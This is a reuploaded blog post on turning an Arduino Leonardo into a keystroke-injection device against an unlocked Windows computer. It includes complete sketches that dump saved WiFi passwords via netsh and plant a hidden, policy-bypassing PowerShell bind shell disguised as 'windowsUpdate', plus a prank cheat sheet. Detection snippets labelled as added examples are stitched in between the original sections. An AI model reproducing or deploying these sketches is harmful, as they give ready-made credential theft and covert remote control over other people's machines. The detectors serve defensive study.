
Hacking A Computer Using Arduino.

The document summarizes how an Arduino Leonardo microcontroller board can be used to hack an unlocked computer by masquerading as a keyboard and extracting WiFi passwords. It introduces Arduino basics and shows code for a sketch that uses buttons to trigger extracting WiFi passwords from the computer using PowerShell commands, saving them to the Arduino's memory, and then dumping the data to another computer when the button is pressed again.

Uploaded by

Elijah Payne

12/21/22, 5:16 PM Hacking a computer using Arduino.

Introducing Arduino’s basic functions… | by Kang Hao | CSG @ GovTech | Medium

Published in CSG @ GovTech

Kang Hao

Jul 22, 2020 · 9 min read

Hacking a computer using Arduino


Imagine this scenario…

Video title: This is what happens when you leave your school computer unlocked for too long.

You get the picture. In this article, I will explain how I hacked into someone’s
computer that was left unlocked while s/he was on a quick toilet break. [Caveat: I
asked his/her permission before hacking the computer and returned the
computer to its original state once the hacking was done.] However, there was only
so much that I could do in such a short time. To speed up the hacking process, I
created my very own Rubber Ducky USB using Arduino.

Introduction to Arduino
Arduino is both a micro-controller and micro-controller kit that enables you to
control hardware devices using C, a programming language. There are many
different types of Arduino, each with their unique attributes. For example, Arduino
Uno is considered one of the most popular Arduino boards due to its low price and
its basic suite of functionalities.

This article focuses on the Arduino Leonardo, a micro-controller board based on
the ATmega32u4 with built-in USB communication. This feature enables it to
disguise itself as a keyboard or a mouse connected to the computer. I have tried
other Arduinos, such as Nano and Uno, but they are unable to fool the computer.

Arduino Leonardo

For this demo, I set up two buttons with specific functions. The left button would
trigger the function to “masquerade” as a keyboard, and concurrently send
keystrokes at incredible speeds and capture data. The right button would discharge
the captured data to the computer that I am using for the attack.
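
An added example (not from the original article): because the injected text arrives far faster and more evenly than a person types, a defender can flag long keystroke runs with very small gaps between keys. The event format (timestamp in milliseconds, key), the thresholds and the sample data are assumptions constructed for illustration.

```python
from statistics import median

# Assumed thresholds, to be tuned per environment: people rarely sustain
# gaps below ~30 ms between keys, and injected commands come in long runs.
MAX_GAP_MS = 30
MIN_BURST = 15


def find_injection_bursts(events, max_gap_ms=MAX_GAP_MS, min_burst=MIN_BURST):
    """events: list of (timestamp_ms, key) sorted by time.

    Returns one record per run of at least min_burst keys in which every
    gap between consecutive keys is <= max_gap_ms.
    """
    bursts, start = [], 0
    for i in range(1, len(events) + 1):
        # Close the current run at end of input or on a human-sized pause.
        if i == len(events) or events[i][0] - events[i - 1][0] > max_gap_ms:
            run = events[start:i]
            if len(run) >= min_burst:
                gaps = [b[0] - a[0] for a, b in zip(run, run[1:])]
                bursts.append({
                    "start_ms": run[0][0],
                    "keys": len(run),
                    "median_gap_ms": median(gaps),
                    "text": "".join(key for _, key in run),
                })
            start = i
    return bursts


def typed_sample(text, t0, gaps):
    """Build constructed sample events: one per character, cycling gaps."""
    out, t = [], t0
    for i, ch in enumerate(text):
        out.append((t, ch))
        t += gaps[i % len(gaps)]
    return out


# Constructed data: a person typing notes, then a machine-speed burst.
HUMAN = typed_sample("meeting notes for monday", 0, [140, 95, 210, 180, 120])
INJECTED = typed_sample("netsh wlan show profiles", 10_000, [4, 5, 4, 6])
SAMPLE = HUMAN + INJECTED

if __name__ == "__main__":
    for burst in find_injection_bursts(SAMPLE):
        print(burst)
```

Treat a hit as one signal to correlate with others, such as a new USB keyboard appearing seconds earlier, rather than as proof on its own.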

First, let me introduce the hardware components of the Arduino Leonardo and
demonstrate basic Arduino controls on the micro-controller and micro-controller
kit.

All Arduino boards consist of a setup function and a loop function.

Setup function
This function executes only once whenever the Arduino is powered up.

Loop function
This function runs continuously after the setup function has executed.

I noticed that the buttons are connected to pin 2 and pin 3 respectively in the circuit
board (left) diagram. Thus, I defined pinMode(2, INPUT); and pinMode(3, INPUT);
as INPUT components in the sketch (right). The loop function is where I defined the
execution of our function.

Attack 1: Steal WiFi password


Whenever a computer connects to a WiFi connection, the WiFi password is stored
in the system. This is good news as I could leverage the PowerShell command to
obtain a list of WiFi Service Set Identifiers (SSIDs) with passwords.

#include <Keyboard.h>
#include <EEPROM.h>
char stringArray[500] = {""};
boolean extracted = false, dispatched = false;
int extractButton = 2, dispatchButton = 3;

void setup() {
Serial.begin(9600);
pinMode(extractButton, INPUT);
pinMode(dispatchButton, INPUT);
Keyboard.begin();
}
void loop() {
if(digitalRead(extractButton) == HIGH && !extracted) {
extractingData();
extracted = true;
}
if(digitalRead(dispatchButton) == HIGH && !dispatched) {
dispatchingData();
dispatched = true;
}
if(digitalRead(extractButton) == LOW)
extracted = false;
if(digitalRead(dispatchButton) == LOW)
dispatched = false;
}

void extractingData() {
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.print("Powershell");
delay(500);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("(netsh wlan show profiles) | Select-String
\"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %
{(netsh wlan show profile name=\"$name\" key=clear)} | Select-
String \"Key Content\\W+\\:(.+)$\" | %
{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{
PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-
String -OutVariable dataCaptured");
delay(500);

Keyboard.println("$comPort = ((Get-WmiObject -query \"SELECT *


FROM Win32_PnPEntity\" | Where {$_.Name -Match
\"COM\\d+\"}).name).Split(\"COM\")");
delay(200);
Keyboard.println("$comPort = [int]$comPort[$comPort.length -
1].replace(\")\", \"\")");
delay(200);
Keyboard.print("$serialObject = new-Object
System.IO.Ports.SerialPort COM");
Keyboard.print("$comPort");
Keyboard.println(", 9600, None, 8, one");
delay(200);
Keyboard.println("$serialObject.Open()");
delay(200);
Keyboard.println("$serialObject.Write(\"$dataCaptured\")");
delay(200);
Keyboard.println("$serialObject.close()");
delay(200);
Keyboard.println("exit");
delay(200);
for(int i=0; i<sizeof(stringArray)-1; i++)
stringArray[i] = Serial.read();
EEPROM.put(1, stringArray);
}

void dispatchingData() {
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.println("notepad");
delay(700);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print(EEPROM.get(1, stringArray));
}

Attack Summary
1. First, I connect the Arduino Leonardo to the victim’s computer through the USB
port. Remember the two buttons earlier? When the left button is triggered, the
program launches the PowerShell terminal and begins inputting commands.

2. The program then extracts the WiFi SSIDs along with their passwords and saves
them to the Arduino’s Electrically Erasable Programmable Read-only Memory
(EEPROM). As it is a non-volatile flash memory device, stored information is
retained even when it is no longer powered.

3. After the Arduino has executed its functions, I unplug it from the victim’s
computer and connect it to my own. This time, I trigger the right button, which
causes the Arduino to dump the data stored in the EEPROM into my
computer.

WiFi SSID Display Command

(netsh wlan show profiles) |


Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim();
$_} |
%{(netsh wlan show profile name="$name" key=clear)} |
Select-String "Key Content\W+\:(.+)$" |


%{$pass=$_.Matches.Groups[1].Value.Trim(); $_} |
%{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} |
Format-Table –AutoSize |
Out-String -OutVariable dataCaptured

This is scary!
While we can do this manually, why not use our favourite Arduino to help us?

The WiFi SSID display command is lengthy and difficult to understand. In the next
part of this article, I will break down the command into a few digestible sections to
make it easier to understand the function of the code.

Understanding the command

Section A
This section of the command displays the cached SSIDs and filters the output with
“\:(.+)$” as a regular expression.

(netsh wlan show profiles) | Select-String "\:(.+)$" | %


{$name=$_.Matches.Groups[1].Value.Trim();

List of saved SSID

Section B

%{(netsh wlan show profile name="$name" key=clear)}

I call the netsh wlan function again to obtain more information about the SSIDs.
Notice that I use the $name variable which I retrieved from the previous pipe?

Section C
Here, I extract the Key Content (password) and assign it to a $pass variable.

Select-String "Key Content\W+\:(.+)$" | %


{$pass=$_.Matches.Groups[1].Value.Trim(); $_}

Section D
Finally, I create a PS Object with Profile Name and Password attributes, display it
in a table format and write the result to the $dataCaptured variable.

%{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-


Table –AutoSize | Out-String -OutVariable dataCaptured

Saving data to the EEPROM command


To write data to our Arduino, the two devices — computer and Arduino — must
interact using serial communication. Serial communication is the process of
transmitting data one bit at a time, over a communication channel or USB. Each
port is identified by COM1, COM2, COM3, COM4, and so on. Each COM represents
an input/output (I/O) and an interrupt request (IRQ) address. The I/O address
transfers and receives data to and from a peripheral device such as a mouse or
keyboard. The speed of the Serial Communication or ‘baud rate’ is measured in bits
per second. In this demo, I used 9600 bits per second.

# Search for available COM port


$comPort = ((Get-WmiObject -query "SELECT * FROM Win32_PnPEntity" |
Where {$_.Name -Match "COM\d+"}).name).Split("COM");
$comPort = [int]$comPort[$comPort.length - 1].replace(")", "");

# Connect to COM port and begin writing data


$serialObject = new-Object System.IO.Ports.SerialPort COM$comPort ,
9600, None, 8, one;
$serialObject.Open();
$serialObject.Write("$dataCaptured");

Once the data is transmitted, I disconnect the Arduino from the victim’s computer
and connect it to my computer. I then trigger the right button to begin the
dispatching process, where the captured data is transferred to my notepad.
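
The technique depends on a single USB device presenting both a keyboard and a COM port to the host. This added example (not the author's code) groups a device inventory by USB vendor/product ID and reports any device that exposes both; the CSV column names and every row of the sample inventory are constructed assumptions.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed inventory in the shape of a PnP device export.
# Assumed columns: Class, FriendlyName, InstanceId.
SAMPLE_CSV = r"""Class,FriendlyName,InstanceId
Keyboard,HID Keyboard Device,HID\VID_046D&PID_C31C&MI_00\7&1A2B3C&0&0000
Mouse,HID-compliant mouse,HID\VID_046D&PID_C077\6&2B3C4D&0&0000
Ports,USB Serial Device (COM3),USB\VID_0403&PID_6001\A50285BI
Ports,Arduino Leonardo (COM5),USB\VID_2341&PID_8036&MI_00\6&3C4D5E&0&0000
HIDClass,USB Input Device,USB\VID_2341&PID_8036&MI_02\6&3C4D5E&0&0002
Keyboard,HID Keyboard Device,HID\VID_2341&PID_8036&MI_02\7&4D5E6F&0&0000
"""

VID_PID = re.compile(r"VID_([0-9A-F]{4})&PID_([0-9A-F]{4})", re.IGNORECASE)
COM_PORT = re.compile(r"\((COM\d+)\)")


def keyboards_with_serial(csv_text):
    """Return USB devices (by VID/PID) that expose a keyboard AND a COM port."""
    devices = defaultdict(lambda: {"classes": set(), "com_ports": set()})
    for row in csv.DictReader(io.StringIO(csv_text)):
        ids = VID_PID.search(row["InstanceId"])
        if not ids:
            continue  # node is not backed by a USB device
        # Interfaces of one composite device share the same VID/PID.
        dev = devices[(ids.group(1).upper(), ids.group(2).upper())]
        dev["classes"].add(row["Class"])
        port = COM_PORT.search(row["FriendlyName"])
        if port:
            dev["com_ports"].add(port.group(1))
    return [
        {"vid": vid, "pid": pid, "com_ports": sorted(d["com_ports"])}
        for (vid, pid), d in sorted(devices.items())
        if {"Keyboard", "Ports"} <= d["classes"]
    ]


if __name__ == "__main__":
    for finding in keyboards_with_serial(SAMPLE_CSV):
        print(finding)
```

Some legitimate hardware also combines these interfaces, so a finding is a prompt to identify the device, not a verdict.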

Attack 2: Pop a shell


At this point, you must be thinking: Why stop at stealing our victim’s WiFi SSID and
password when we can obtain more information? In this section, let me show you
how to pop a shell.

#include <Keyboard.h>
#include <EEPROM.h>

char stringArray[50] = {""};


boolean extracted = false, dispatched = false;
int extractButton = 2, dispatchButton = 3;
void setup() {
Serial.begin(9600);
pinMode(extractButton, INPUT);
pinMode(dispatchButton, INPUT);
Keyboard.begin();
}
void loop() {
if(digitalRead(extractButton) == HIGH && !extracted) {
shell();
extracted = true;
}
if(digitalRead(dispatchButton) == HIGH && !dispatched) {
ipaddr();
dispatched = true;
}
if(digitalRead(extractButton) == LOW)
extracted = false;
if(digitalRead(dispatchButton) == LOW)
dispatched = false;
}

void shell() {
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.print("cmd");
delay(500);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("set updateSource=\"function
windowsUpdate{$stream=$client.GetStream();
[byte[]]$bytes=0..65535^|^%{0};$sendbytes=
([text.encoding]::ASCII).GetBytes('Running as user '+$env:username+'
on
'+$env:computername+'.');$stream.Write($sendbytes,0,$sendbytes.Lengt
h);$sendbytes=([text.encoding]::ASCII).GetBytes('PS '+(Get-

Location).Path+'^>');$stream.Write($sendbytes,0,$sendbytes.Length);w
hile(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0)
{$EncodedText=New-Object -TypeName
System.Text.ASCIIEncoding;$data=$EncodedText.GetString($bytes,0,$i);
try{$sendback=(IEX -Command $data 2^>^&1 ^| Out-String
);}catch{}$sendback2 = $sendback + 'PS ' + (Get-Location).Path +
'^> ';$x = ($error[0] ^|Out^-String);$error.clear();$sendback2 =
$sendback2 + $x;$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyt
e,0,$sendbyte.Length);$stream.Flush();}$client.Close();if($listener)
{$listener.Stop();}}$listener=
[System.Net.Sockets.TcpListener]5566;$listener.start();rm
update.ps1;$client=$listener.AcceptTcpClient();windowsUpdate\"");
delay(500);

Keyboard.println("echo %updateSource:~1,1014%>update.ps1");
delay(200);
Keyboard.println("powershell -ep bypass -windowstyle hidden -
file update.ps1");
delay(500);

Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.print("Powershell");
delay(500);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("Get-NetIPAddress -AddressFamily IPv4 -
suffixorigin dhcp|select ipaddress|Out-String -OutVariable d");
delay(200);
Keyboard.println("$c=((Get-WmiObject -query \"SELECT * FROM
Win32_PnPEntity\"|Where{$_.Name -Match
\"COM\\d+\"}).name).Split(\"COM\")");
delay(200);
Keyboard.println("$c=[int]$c[$c.length-1].replace(\")\",\"\")");
delay(200);
Keyboard.print("$s=new-Object System.IO.Ports.SerialPort COM");
Keyboard.print("$c");
Keyboard.println(",9600,None,8,one");
delay(200);
Keyboard.println("$s.Open()");
delay(200);
Keyboard.println("$s.Write(\"$d\")");
delay(200);
Keyboard.println("$s.close()");
delay(200);
Keyboard.println("exit");
delay(200);

for(int i=0; i<sizeof(stringArray)-1; i++)


stringArray[i] = Serial.read();
EEPROM.put(1, stringArray);
}
void ipaddr() {
delay(500);
Keyboard.press(KEY_LEFT_GUI);
delay(20);
Keyboard.release(KEY_LEFT_GUI);
delay(500);
Keyboard.println("notepad");
delay(700);
Keyboard.press(KEY_RETURN);
delay(200);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print(EEPROM.get(1, stringArray));
}

The code above may look complicated, so let us break it down into steps:

1. After connecting the Arduino to the victim’s computer, I trigger the left button.

2. The program launches the command prompt, where it creates a command
prompt variable, namely updateSource, that stores the PowerShell shellcode.

3. After which, the program creates a PowerShell script update.ps1 that has the
value of updateSource written into it.

4. Lastly, the program executes the command prompt code powershell -ep bypass
-windowstyle hidden -file update.ps1. This ensures that the update.ps1
program will run in the background.

5. Before ending the exploit, the program launches PowerShell once again and the
victim’s IP address is written into the EEPROM. This is similar to the WiFi
dispatching of the password described earlier.

6. I disconnect the Arduino from the victim’s computer and connect it to mine.
This time, I trigger the right button to unload the victim’s IP address.

7. I conclude the attack by performing a netcat connection to establish the bind
shell.

Here’s a cleaned up version of the shell code:

#Function for shell


function windowsUpdate {
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | %{0};
$sendbytes = ([text.encoding]::ASCII).GetBytes('Running as user
'+$env:username+' on '+$env:computername+'.');

$stream.Write($sendbytes, 0, $sendbytes.Length);
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-
Location).Path + '>');

$stream.Write($sendbytes, 0, $sendbytes.Length);

while (($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0) {


$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding;
$data = $EncodedText.GetString($bytes,0,$i);

try {
#Receive command from the attacker
$sendback=(IEX -Command $data 2 >&1 | Out-String );
}
catch {}

$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ';


$x = ($error[0] | Out-String);
$error.clear();
$sendback2 = $sendback2 + $x;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}

$client.Close();
if ($listener) {
$listener.Stop();
}
}

#Listening for connection


$listener = [System.Net.Sockets.TcpListener] 5566;
$listener.start();

#Remove update.ps1 here!


rm update.ps1;

$client = $listener.AcceptTcpClient();

#Invoke function
windowsUpdate;

To summarise, the program has created a function that constructs a bind shell on
port 5566 that is available to anybody who connects to it. The program also deletes
the update.ps1 file while waiting for an incoming connection. At this point, I connect
to the bind shell function and begin controlling the victim’s computer. Isn’t this easy
PowerShell scripting?
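
Both attacks in this article leave recognisable traces when process command-line auditing (Windows event 4688) and PowerShell script block logging (event 4104) are enabled. This added example (not part of the original article) matches the commands shown above against constructed log events; the rule names, the flattened event layout and the host names are assumptions.

```python
import re

# Each rule: (name, event id, field inspected, patterns that must ALL match).
RULES = [
    ("wifi-key-export", 4688, "CommandLine",
     [r"\bnetsh(\.exe)?\b", r"wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear"]),
    ("powershell-serial-port", 4104, "ScriptBlockText",
     [r"System\.IO\.Ports\.SerialPort"]),
    ("hidden-policy-bypass", 4688, "CommandLine",
     [r"\bpowershell(\.exe)?\b", r"-(ep|ex\w*)\s+bypass", r"-w\w*\s+hidden"]),
    ("powershell-tcp-listener-iex", 4104, "ScriptBlockText",
     [r"System\.Net\.Sockets\.TcpListener", r"\b(IEX|Invoke-Expression)\b"]),
]
COMPILED = [(name, eid, field, [re.compile(p, re.I | re.S) for p in pats])
            for name, eid, field, pats in RULES]


def match_event(event):
    """Return the names of all rules that one event satisfies."""
    hits = []
    for name, eid, field, pats in COMPILED:
        text = event.get(field, "")
        if event.get("EventID") == eid and all(p.search(text) for p in pats):
            hits.append(name)
    return hits


def triage(events):
    """Group rule hits per host; several distinct rules on one host rank higher."""
    per_host = {}
    for ev in events:
        for rule in match_event(ev):
            per_host.setdefault(ev["Computer"], set()).add(rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


# Constructed events; command text is taken from the commands in this article.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS-014",
     "CommandLine": 'netsh wlan show profile name="OfficeWiFi" key=clear'},
    {"EventID": 4104, "Computer": "WS-014",
     "ScriptBlockText": "$serialObject = new-Object System.IO.Ports.SerialPort COM5, 9600, None, 8, one"},
    {"EventID": 4688, "Computer": "WS-022",
     "CommandLine": "powershell -ep bypass -windowstyle hidden -file update.ps1"},
    {"EventID": 4104, "Computer": "WS-022",
     "ScriptBlockText": "$listener=[System.Net.Sockets.TcpListener]5566;"
                        "$sendback=(IEX -Command $data 2>&1 | Out-String)"},
    # Benign activity that must not alert.
    {"EventID": 4688, "Computer": "WS-030", "CommandLine": "netsh wlan show profiles"},
    {"EventID": 4688, "Computer": "WS-030", "CommandLine": "powershell -File backup.ps1"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```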

DEMO TIME
Here are some interesting videos on the demo:

Injecting shell code to the victim and extracting the IP address

Arduino Bind Shell (1/2)

Dispatching the IP address and controlling the victim’s computer

Arduino Bind Shell (2/2)

There are many ways to break the news to our unsuspecting victims. Here is a cheat
sheet of what you can do:

# Send keystroke to the victim's computer


$wshell = New-Object -ComObject wscript.shell;
$wshell.sendKeys(" ");
$wshell.sendKeys("Hahaha");

# Write to file
echo You have been hacked! > hacked.txt

# Open file with notepad


notepad hacked.txt

# Close browser
taskkill /IM firefox.exe /F
taskkill /IM chrome.exe /F

# Open tab with URL for firefox


cd "C:\Program Files\Mozilla Firefox"
firefox.exe https://www.google.com/

# Open tab with URL for chrome


cd "Path\To\Chrome"
chrome.exe https://www.google.com/

Summary
In this article, I have shared with you some of Arduino’s basic functions and
introduced EEPROM, serial communication, USB Rubber Ducky, and a little on
PowerShell scripting.

As the hacking processes run in the background, victims will not be able to detect if
their computers have been hacked. To mitigate potential risks of having your
computer hacked — my dear colleagues included — always remember to lock your
computer when you are away from your desk.

Remember, cybersecurity starts with YOU!


https://medium.com/csg-govtech/hacking-a-computer-using-arduino-8f0ddddab7e1 15/16
